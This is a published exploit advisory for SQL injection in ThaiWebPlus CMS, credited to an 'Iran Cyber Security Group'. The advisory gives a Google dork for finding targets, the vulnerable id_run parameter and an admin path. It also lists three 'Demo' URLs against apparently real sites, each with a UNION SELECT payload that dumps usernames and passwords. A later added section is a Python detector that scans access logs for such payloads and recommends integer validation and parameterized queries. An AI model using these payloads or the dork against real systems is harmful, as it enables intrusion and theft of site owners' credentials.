ThaiWebPlus CMS Sql Injection Vulnerability

2015.12.10
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

###################################################
# [+] Exploit Title: ThaiWebPlus CMS Sql Injection Vulnerability
# [+] Google Dork: Powered by ThaiWebPlus
# [+] Exploit Author: Iran Cyber Security Group
# [+] Discovered By: Pi.Hack
# [+] Vendor Homepage: http://thaiwebplus.com
# [+] Version: All version
# [+] Tested on: Windows & Linux
###################################################
# [+] Exploit:
# [+] http://localhost/index.php?Content=product&id_run=[ID]'[Sql Injection]
###################################################
# [+] Proof:
# [+] http://localhost/index.php?Content=product&id_run=[ID]' [Not loaded]
###################################################
# [+] Demo:
# [+] http://www.yXingphaiboon-aquarium.com/index.php?Content=product&id_run=-30+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user--
# [+] http://88paXrt.com/index.php?Content=product&id_run=-3+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user--
# [+] http://amXpcooling.com/index.php?Content=service&id_run=-1+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user--
###################################################
# Admin Page:
# site.com/_admin/
###################################################
# Contact mail: uid.root@yahoo.com
# Skype: uid.root
# Home Page : www.Iran-Cyber.Org
# Thanks To : root3r | MOHAMAD-NOFOZI | KamraN HellisH | JOK3R | WH!T3_W01F | CRY$I$ BL4CK | And All Members Of Iran-Cyber.Org
###################################################
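
A detection check for the parameter named in the advisory, added here as an example and not part of the original advisory or the vendor's code: it scans web access logs for `id_run` values that are not plain integers and flags those carrying SQL tokens. The combined log format, the assumption that legitimate `id_run` values are integers, the function names and the sample log lines are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate id_run value is a plain non-negative integer.
VALID_ID = re.compile(r"\d+")
# Request target from a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# SQL tokens of the kind visible in the advisory's requests.
SQL_HINT = re.compile(r"union\s+select|group_concat|--|'", re.I)

def classify_id_run(value):
    """Return 'ok', 'sqli' or 'malformed' for one decoded id_run value."""
    if VALID_ID.fullmatch(value):
        return "ok"
    return "sqli" if SQL_HINT.search(value) else "malformed"

def scan(lines):
    """Yield (client_ip, verdict, decoded_value) for each suspicious id_run."""
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qs decodes %xx and turns '+' into a space, as the server would.
        for value in parse_qs(query, keep_blank_values=True).get("id_run", []):
            verdict = classify_id_run(value)
            if verdict != "ok":
                yield line.split(" ", 1)[0], verdict, value

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2015:10:00:01 +0000] "GET /index.php?Content=product&id_run=30 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Dec/2015:10:00:05 +0000] "GET /index.php?Content=product&id_run=30%27 HTTP/1.1" 200 312',
    '203.0.113.9 - - [10/Dec/2015:10:00:09 +0000] "GET /index.php?Content=product&id_run=-30+union+select+1,2,3+from+user-- HTTP/1.1" 200 4800',
    '198.51.100.7 - - [10/Dec/2015:10:01:00 +0000] "GET /index.php?Content=service&id_run=abc HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, verdict, value in scan(SAMPLE_LOG):
        print(f"{ip}\t{verdict}\t{value!r}")
```

The same integer-only rule, enforced in the application before the value reaches the database and combined with parameterized queries, removes the injection point rather than only detecting attempts against it.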



Copyright 2024, cxsecurity.com

 
